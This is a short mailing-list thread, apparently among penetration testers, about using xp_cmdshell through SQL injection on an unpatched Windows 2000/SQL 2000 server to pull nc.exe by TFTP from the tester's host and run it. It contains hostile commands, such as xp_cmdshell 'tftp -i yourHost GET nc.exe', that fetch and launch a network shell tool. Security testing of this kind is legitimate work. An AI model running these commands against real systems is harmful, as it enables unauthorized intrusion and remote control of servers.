Re: TFTP and XP_CMDSHELL - Weird

HI jose,

try like that

xp_cmdshell 'tftp -i yourHost GET nc.exe'
xp_cmdshell 'nc.exe'

and you will work in the current directory (c:\windows\system32).


Jose Selvi wrote:
> Maybe sqlsvc user can't write in c:\ folder. Can He?.
>
> The first call to tftp you are using Administrator user, who of course 
> can write in c:\ .
>
> Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
> It must work.
>
> Andres Molinetti escribió:
>
> > Hi, I am testing a Web App vulnerable to SQL Injection.
> > It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
> >
> > While trying to use the xp_cmdshell to upload nc.exe from my tftpd 
> > server to the Webserver, I experienced some problems.
> >
> > I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
> >
> > As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost 
> > GET nc.exe c:\nc.exe". File is downloaded.
> >
> > When I tried it through the wep app it failed. I tried directly 
> > through SQL Query Analizer and it also failed.
> >
> > SQL is running as a low priviledged account (sqlsvc)...
> >
> > Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET 
> > nc.exe c:\nc.exe" and  IT FAILED.!!
> >
> > I can easily deduce that the problem is the TFTP client (tftp.exe)...
> >
> > Any Ideas?

--
Frederic Charpentier - Xmco Partners
Security Consulting / Pentest
web  : http://www.xmcopartners.com